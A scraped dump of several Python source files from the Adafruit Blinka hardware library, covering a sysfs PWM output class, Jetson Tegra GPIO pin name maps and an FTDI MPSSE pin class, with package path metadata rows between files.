with open(path, "w", encoding="utf-8") as f_attr:
f_attr.write(value + "\n")
def _read_pin_attr(self, attr):
# Make sure the pin is active
self._is_deinited()
path = os.path.join(
self._sysfs_path,
self._channel_path.format(self._channel),
self._pin_path.format(self._channel, self._pwmpin),
attr,
)
with open(path, "r", encoding="utf-8") as f_attr:
return f_attr.read().strip()
# Mutable properties
def _get_period(self):
period_ns = self._read_pin_attr(self._pin_period_path)
try:
period_ns = int(period_ns)
except ValueError:
raise PWMError(
None, 'Unknown period value: "%s"' % period_ns
) from ValueError
# Convert period from nanoseconds to seconds
period = period_ns / 1e9
# Update our cached period
self._period = period
return period
def _set_period(self, period):
if not isinstance(period, (int, float)):
raise TypeError("Invalid period type, should be int or float.")
# Convert period from seconds to integer nanoseconds
period_ns = int(period * 1e9)
self._write_pin_attr(self._pin_period_path, "{}".format(period_ns))
# Update our cached period
self._period = float(period)
period = property(_get_period, _set_period)
"""Get or set the PWM's output period in seconds.
Raises:
PWMError: if an I/O or OS error occurs.
TypeError: if value type is not int or float.
:type: int, float
"""
def _get_duty_cycle(self):
duty_cycle_ns = self._read_pin_attr(self._pin_duty_cycle_path)
try:
duty_cycle_ns = int(duty_cycle_ns)
except ValueError:
raise PWMError(
None, 'Unknown duty cycle value: "%s"' % duty_cycle_ns
) from ValueError
# Convert duty cycle from nanoseconds to seconds
duty_cycle = duty_cycle_ns / 1e9
# Convert duty cycle to ratio from 0.0 to 1.0
duty_cycle = duty_cycle / self._period
# convert to 16-bit
duty_cycle = int(duty_cycle * 65535)
return duty_cycle
def _set_duty_cycle(self, duty_cycle):
if not isinstance(duty_cycle, (int, float)):
raise TypeError("Invalid duty cycle type, should be int or float.")
# convert from 16-bit
duty_cycle /= 65535.0
if not 0.0 <= duty_cycle <= 1.0:
raise ValueError("Invalid duty cycle value, should be between 0.0 and 1.0.")
# Convert duty cycle from ratio to seconds
duty_cycle = duty_cycle * self._period
# Convert duty cycle from seconds to integer nanoseconds
duty_cycle_ns = int(duty_cycle * 1e9)
self._write_pin_attr(self._pin_duty_cycle_path, "{}".format(duty_cycle_ns))
duty_cycle = property(_get_duty_cycle, _set_duty_cycle)
"""Get or set the PWM's output duty cycle as a ratio from 0.0 to 1.0.
Raises:
PWMError: if an I/O or OS error occurs.
TypeError: if value type is not int or float.
ValueError: if value is out of bounds of 0.0 to 1.0.
:type: int, float
"""
def _get_frequency(self):
return 1.0 / self._get_period()
def _set_frequency(self, frequency):
if not isinstance(frequency, (int, float)):
raise TypeError("Invalid frequency type, should be int or float.")
self._set_period(1.0 / frequency)
frequency = property(_get_frequency, _set_frequency)
"""Get or set the PWM's output frequency in Hertz.
Raises:
PWMError: if an I/O or OS error occurs.
TypeError: if value type is not int or float.
:type: int, float
"""
def _get_enabled(self):
enabled = self._read_pin_attr(self._pin_enable_path)
if enabled == "1":
return True
if enabled == "0":
return False
raise PWMError(None, 'Unknown enabled value: "%s"' % enabled)
def _set_enabled(self, value):
"""Get or set the PWM's output enabled state.
Raises:
PWMError: if an I/O or OS error occurs.
TypeError: if value type is not bool.
:type: bool
"""
if not isinstance(value, bool):
raise TypeError("Invalid enabled type, should be string.")
self._write_pin_attr(self._pin_enable_path, "1" if value else "0")
# String representation
def __str__(self):
return "PWM%d, pin %s (freq=%f Hz, duty_cycle=%f%%)" % (
self._channel,
self._pin,
self.frequency,
self.duty_cycle * 100,
) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/microcontroller/am335x/sysfs_pwmout.py | sysfs_pwmout.py |
"""Tegra T210 pin names"""
import atexit
from Jetson import GPIO
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False) # shh!
class Pin:
"""Pins dont exist in CPython so...lets make our own!"""
IN = 0
OUT = 1
LOW = 0
HIGH = 1
PULL_NONE = 0
PULL_UP = 1
PULL_DOWN = 2
id = None
_value = LOW
_mode = IN
def __init__(self, bcm_number):
self.id = bcm_number
def __repr__(self):
return str(self.id)
def __eq__(self, other):
return self.id == other
def init(self, mode=IN, pull=None):
"""Initialize the Pin"""
if mode is not None:
if mode == self.IN:
self._mode = self.IN
GPIO.setup(self.id, GPIO.IN)
elif mode == self.OUT:
self._mode = self.OUT
GPIO.setup(self.id, GPIO.OUT)
else:
raise RuntimeError("Invalid mode for pin: %s" % self.id)
if pull is not None:
if self._mode != self.IN:
raise RuntimeError("Cannot set pull resistor on output")
if pull == self.PULL_UP:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
elif pull == self.PULL_DOWN:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
else:
raise RuntimeError("Invalid pull for pin: %s" % self.id)
def value(self, val=None):
"""Set or return the Pin Value"""
if val is not None:
if val == self.LOW:
self._value = val
GPIO.output(self.id, val)
return None
if val == self.HIGH:
self._value = val
GPIO.output(self.id, val)
return None
raise RuntimeError("Invalid value for pin")
return GPIO.input(self.id)
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
"""Clean up pins"""
print("Exiting... \nCleaning up pins")
GPIO.cleanup()
# pylint: enable=no-method-argument
# Cannot be used as GPIO
SDA = Pin("GEN1_I2C_SDA")
SCL = Pin("GEN1_I2C_SCL")
SDA_1 = Pin("GEN2_I2C_SDA")
SCL_1 = Pin("GEN2_I2C_SCL")
# These pins are native to TX1
BB03 = Pin("GPIO_X1_AUD")
X02 = Pin("MOTION_INT")
H07 = Pin("AP_WAKE_NFC")
E04 = Pin("DMIC3_CLK")
U03 = Pin("UART1_CTS")
U02 = Pin("UART1_RTS")
B03 = Pin("DAP1_SCLK")
B00 = Pin("DAP1_FS")
B01 = Pin("DAP1_DIN")
B02 = Pin("DAP1_DOUT")
P17 = Pin("GPIO_EXP_P17")
E05 = Pin("DMIC3_DAT")
X00 = Pin("MODEM_WAKE_AP")
P16 = Pin("GPIO_EXP_P16")
X03 = Pin("ALS_PROX_INT")
# These pins are native to NANO
S05 = Pin("CAM_AF_EN")
Z00 = Pin("GPIO_PZ0")
V00 = Pin("LCD_BL_PW")
G03 = Pin("UART2_CTS")
G02 = Pin("UART2_RTS")
J07 = Pin("DAP4_SCLK")
J04 = Pin("DAP4_FS")
J05 = Pin("DAP4_DIN")
J06 = Pin("DAP4_DOUT")
Y02 = Pin("LCD_TE")
DD00 = Pin("SPI2_CS1")
B07 = Pin("SPI2_CS0")
B05 = Pin("SPI2_MISO")
B04 = Pin("SPI2_MOSI")
B06 = Pin("SPI2_SCK")
# These pins are shared across T210
BB00 = Pin("AUD_MCLK")
C04 = Pin("SPI1_CS1")
C03 = Pin("SPI1_CS0")
C01 = Pin("SPI1_MISO")
C00 = Pin("SPI1_MOSI")
C02 = Pin("SPI1_SCK")
E06 = Pin("GPIO_PE6")
i2cPorts = (
(0, SCL, SDA),
(1, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((0, C02, C00, C01), (1, B06, B04, B05)) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/microcontroller/tegra/t210/pin.py | pin.py |
"""Tegra T194 pin names"""
import atexit
from Jetson import GPIO
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False) # shh!
class Pin:
"""Pins dont exist in CPython so...lets make our own!"""
IN = 0
OUT = 1
LOW = 0
HIGH = 1
PULL_NONE = 0
PULL_UP = 1
PULL_DOWN = 2
id = None
_value = LOW
_mode = IN
def __init__(self, bcm_number):
self.id = bcm_number
def __repr__(self):
return str(self.id)
def __eq__(self, other):
return self.id == other
def init(self, mode=IN, pull=None):
"""Initialize the Pin"""
if mode is not None:
if mode == self.IN:
self._mode = self.IN
GPIO.setup(self.id, GPIO.IN)
elif mode == self.OUT:
self._mode = self.OUT
GPIO.setup(self.id, GPIO.OUT)
else:
raise RuntimeError("Invalid mode for pin: %s" % self.id)
if pull is not None:
if self._mode != self.IN:
raise RuntimeError("Cannot set pull resistor on output")
if pull == self.PULL_UP:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
elif pull == self.PULL_DOWN:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
else:
raise RuntimeError("Invalid pull for pin: %s" % self.id)
def value(self, val=None):
"""Set or return the Pin Value"""
if val is not None:
if val == self.LOW:
self._value = val
GPIO.output(self.id, val)
return None
if val == self.HIGH:
self._value = val
GPIO.output(self.id, val)
return None
raise RuntimeError("Invalid value for pin")
return GPIO.input(self.id)
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
"""Clean up pins"""
print("Exiting... \nCleaning up pins")
GPIO.cleanup()
# pylint: enable=no-method-argument
# Cannot be used as GPIO
SDA = Pin("DP_AUX_CH3_N")
SCL = Pin("DP_AUX_CH3_P")
SDA_1 = Pin("GEN2_I2C_SDA")
SCL_1 = Pin("GEN2_I2C_SCL")
# Jetson Xavier only
Q06 = Pin("SOC_GPIO42")
AA03 = Pin("CAN0_DIN")
AA02 = Pin("CAN0_DOUT")
BB01 = Pin("CAN1_EN")
AA00 = Pin("CAN1_DOUT")
H07 = Pin("DAP2_SCLK")
I02 = Pin("DAP2_FS")
I01 = Pin("DAP2_DIN")
I00 = Pin("DAP2_DOUT")
BB00 = Pin("CAN1_STB")
H00 = Pin("SOC_GPIO12")
Q01 = Pin("SOC_GPIO21")
AA01 = Pin("CAN1_DIN")
# Jetson NX only
S04 = Pin("AUD_MCLK")
T05 = Pin("DAP5_SCLK")
Y00 = Pin("SPI3_SCK")
CC04 = Pin("TOUCH_CLK")
Y04 = Pin("SPI3_CS1_N")
Y03 = Pin("SPI3_CS0_N")
Y01 = Pin("SPI3_MISO")
Q05 = Pin("SOC_GPIO41")
Q06 = Pin("SOC_GPIO42")
U00 = Pin("DAP5_FS")
Y02 = Pin("SPI3_MOSI")
T07 = Pin("DAP5_DIN")
T06 = Pin("DAP5_DOUT")
# Clara AGX Xavier only
P04 = Pin("SOC_GPIO04")
# Shared
N01 = Pin("SOC_GPIO54")
R00 = Pin("SOC_GPIO44")
R04 = Pin("UART1_RTS")
R05 = Pin("UART1_CTS")
Z03 = Pin("SPI1_SCK")
Z04 = Pin("SPI1_MISO")
Z05 = Pin("SPI1_MOSI")
Z06 = Pin("SPI1_CS0_N")
Z07 = Pin("SPI1_CS1_N")
i2cPorts = (
(8, SCL, SDA),
(1, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((0, Z03, Z05, Z04),) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/microcontroller/tegra/t194/pin.py | pin.py |
"""Tegra T234 pin names"""
import atexit
from Jetson import GPIO
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False) # shh!
class Pin:
"""Pins dont exist in CPython so...lets make our own!"""
IN = 0
OUT = 1
LOW = 0
HIGH = 1
PULL_NONE = 0
PULL_UP = 1
PULL_DOWN = 2
id = None
_value = LOW
_mode = IN
def __init__(self, bcm_number):
self.id = bcm_number
def __repr__(self):
return str(self.id)
def __eq__(self, other):
return self.id == other
def init(self, mode=IN, pull=None):
"""Initialize the Pin"""
if mode is not None:
if mode == self.IN:
self._mode = self.IN
GPIO.setup(self.id, GPIO.IN)
elif mode == self.OUT:
self._mode = self.OUT
GPIO.setup(self.id, GPIO.OUT)
else:
raise RuntimeError("Invalid mode for pin: %s" % self.id)
if pull is not None:
if self._mode != self.IN:
raise RuntimeError("Cannot set pull resistor on output")
if pull == self.PULL_UP:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
elif pull == self.PULL_DOWN:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
else:
raise RuntimeError("Invalid pull for pin: %s" % self.id)
def value(self, val=None):
"""Set or return the Pin Value"""
if val is not None:
if val == self.LOW:
self._value = val
GPIO.output(self.id, val)
return None
if val == self.HIGH:
self._value = val
GPIO.output(self.id, val)
return None
raise RuntimeError("Invalid value for pin")
return GPIO.input(self.id)
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
"""Clean up pins"""
print("Exiting... \nCleaning up pins")
GPIO.cleanup()
# pylint: enable=no-method-argument
# Cannot be used as GPIO
SDA = Pin("GP16_I2C8_DAT") # I2C4
SCL = Pin("GP81_I2C9_CLK")
SDA_1 = Pin("GP14_I2C2_DAT") # I2C2
SCL_1 = Pin("GP13_I2C2_CLK")
# Jetson AGX Orin
Q06 = Pin("GP66")
R04 = Pin("GP72_UART1_RTS_N")
H07 = Pin("GP122")
R00 = Pin("GP68")
N01 = Pin("GP88_PWM1")
BB00 = Pin("GP25")
H00 = Pin("GP115")
Z05 = Pin("GP49_SPI1_MOSI")
Z04 = Pin("GP48_SPI1_MISO")
P04 = Pin("GP56")
Z03 = Pin("GP47_SPI1_CLK")
Z06 = Pin("GP50_SPI1_CS0_N")
Z07 = Pin("GP51_SPI1_CS1_N")
AA01 = Pin("GP18_CAN0_DIN")
AA00 = Pin("GP17_CAN0_DOUT")
BB01 = Pin("GP26")
AA02 = Pin("GP19_CAN1_DOUT")
I02 = Pin("GP125")
R05 = Pin("GP73_UART1_CTS_N")
AA03 = Pin("GP20_CAN1_DIN")
I01 = Pin("GP124")
I00 = Pin("GP123")
AC06 = Pin("GP167")
Y00 = Pin("SPI1_SCK")
N01 = Pin("GP88_PWM1")
Y04 = Pin("GP40_SPI3_CS1_N")
Y03 = Pin("GP39_SPI3_CS0_N")
Y01 = Pin("GP37_SPI3_MISO")
Q05 = Pin("GP65")
G06 = Pin("GP113_PWM7")
Y02 = Pin("GP38_SPI3_MOSI")
i2cPorts = (
(7, SCL, SDA),
(1, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((0, Z03, Z05, Z04),) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/microcontroller/tegra/t234/pin.py | pin.py |
"""Tegra T186 pin names"""
import atexit
from Jetson import GPIO
GPIO.setmode(GPIO.TEGRA_SOC)
GPIO.setwarnings(False) # shh!
class Pin:
"""Pins dont exist in CPython so...lets make our own!"""
IN = 0
OUT = 1
LOW = 0
HIGH = 1
PULL_NONE = 0
PULL_UP = 1
PULL_DOWN = 2
id = None
_value = LOW
_mode = IN
def __init__(self, bcm_number):
self.id = bcm_number
def __repr__(self):
return str(self.id)
def __eq__(self, other):
return self.id == other
def init(self, mode=IN, pull=None):
"""Initialize the Pin"""
if mode is not None:
if mode == self.IN:
self._mode = self.IN
GPIO.setup(self.id, GPIO.IN)
elif mode == self.OUT:
self._mode = self.OUT
GPIO.setup(self.id, GPIO.OUT)
else:
raise RuntimeError("Invalid mode for pin: %s" % self.id)
if pull is not None:
if self._mode != self.IN:
raise RuntimeError("Cannot set pull resistor on output")
if pull == self.PULL_UP:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_UP)
elif pull == self.PULL_DOWN:
GPIO.setup(self.id, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
else:
raise RuntimeError("Invalid pull for pin: %s" % self.id)
def value(self, val=None):
"""Set or return the Pin Value"""
if val is not None:
if val == self.LOW:
self._value = val
GPIO.output(self.id, val)
return None
if val == self.HIGH:
self._value = val
GPIO.output(self.id, val)
return None
raise RuntimeError("Invalid value for pin")
return GPIO.input(self.id)
# pylint: disable=no-method-argument
@atexit.register
def cleanup():
"""Clean up pins"""
print("Exiting... \nCleaning up pins")
GPIO.cleanup()
# pylint: enable=no-method-argument
# Cannot be used as GPIO
SDA = Pin("GPIO_SEN9")
SCL = Pin("GPIO_SEN8")
SDA_1 = Pin("GEN1_I2C_SDA")
SCL_1 = Pin("GEN1_I2C_SCL")
# Jetson TX2 specific
J06 = Pin("GPIO_AUD1")
AA02 = Pin("CAN_GPIO2")
N06 = Pin("GPIO_CAM7")
N04 = Pin("GPIO_CAM5")
N05 = Pin("GPIO_CAM6")
N03 = Pin("GPIO_CAM4")
AA01 = Pin("CAN_GPIO1")
I05 = Pin("GPIO_PQ5")
T03 = Pin("UART1_CTS")
T02 = Pin("UART1_RTS")
P17 = Pin("GPIO_EXP_P17")
AA00 = Pin("CAN_GPIO0")
Y01 = Pin("GPIO_MDM2")
P16 = Pin("GPIO_EXP_P16")
I04 = Pin("GPIO_PQ4")
J05 = Pin("GPIO_AUD0")
# Jetson TX2 NX specific
W04 = Pin("UART3_RTS")
V01 = Pin("GPIO_SEN1")
C02 = Pin("DAP2_DOUT")
C03 = Pin("DAP2_DIN")
V04 = Pin("GPIO_SEN4")
H02 = Pin("GPIO_WAN7")
H01 = Pin("GPIO_WAN6")
V02 = Pin("GPIO_SEN2")
H00 = Pin("GPIO_WAN5")
H03 = Pin("GPIO_WAN8")
Y03 = Pin("GPIO_MDM4")
N01 = Pin("GPIO_CAM2")
EE02 = Pin("TOUCH_CLK")
U00 = Pin("GPIO_DIS0")
U05 = Pin("GPIO_DIS5")
W05 = Pin("UART3_CTS")
V03 = Pin("GPIO_SEN3")
# Shared pin
J03 = Pin("DAP1_FS")
J02 = Pin("DAP1_DIN")
J01 = Pin("DAP1_DOUT")
J00 = Pin("DAP1_SCLK")
J04 = Pin("AUD_MCLK")
i2cPorts = (
(1, SCL, SDA),
(0, SCL_1, SDA_1),
)
# ordered as spiId, sckId, mosiId, misoId
spiPorts = ((3, N03, N05, N04),) | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/microcontroller/tegra/t186/pin.py | pin.py |
"""MPSSE pin names"""
from adafruit_blinka.microcontroller.ftdi_mpsse.mpsse.url import (
get_ft232h_url,
get_ft2232h_url,
)
class Pin:
"""A basic Pin class for use with FTDI MPSSEs."""
IN = 0
OUT = 1
LOW = 0
HIGH = 1
PULL_NONE = 0
PULL_UP = 1
PULL_DOWN = 2
mpsse_gpio = None
def __init__(self, pin_id=None, interface_id=None):
# setup GPIO controller if not done yet
# use one provided by I2C as default
if not Pin.mpsse_gpio:
# pylint: disable=import-outside-toplevel
from pyftdi.i2c import I2cController
# pylint: enable=import-outside-toplevel
i2c = I2cController()
if interface_id is None:
i2c.configure(get_ft232h_url())
else:
i2c.configure(get_ft2232h_url(interface_id))
Pin.mpsse_gpio = i2c.get_gpio()
# check if pin is valid
if pin_id:
if Pin.mpsse_gpio.all_pins & 1 << pin_id == 0:
raise ValueError("Can not use pin {} as GPIO.".format(pin_id))
# ID is just bit position
self.id = pin_id
def init(self, mode=IN, pull=None):
"""Initialize the Pin"""
if not self.id:
raise RuntimeError("Can not init a None type pin.")
# MPSSE does't have configurable internal pulls?
if pull:
raise NotImplementedError("Internal pull up/down not currently supported.")
pin_mask = Pin.mpsse_gpio.pins | 1 << self.id
current = Pin.mpsse_gpio.direction
if mode == self.OUT:
current |= 1 << self.id
else:
current &= ~(1 << self.id)
Pin.mpsse_gpio.set_direction(pin_mask, current)
def value(self, val=None):
"""Set or return the Pin Value"""
if not self.id:
raise RuntimeError("Can not access a None type pin.")
current = Pin.mpsse_gpio.read(with_output=True)
# read
if val is None:
return 1 if current & 1 << self.id != 0 else 0
# write
if val in (self.LOW, self.HIGH):
if val == self.HIGH:
current |= 1 << self.id
else:
current &= ~(1 << self.id)
# must mask out any input pins
Pin.mpsse_gpio.write(current & Pin.mpsse_gpio.direction)
return None
# release the kraken
raise RuntimeError("Invalid value for pin") | Adafruit-Blinka | /Adafruit_Blinka-8.20.1-py3-none-any.whl/adafruit_blinka/microcontroller/ftdi_mpsse/mpsse/pin.py | pin.py |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.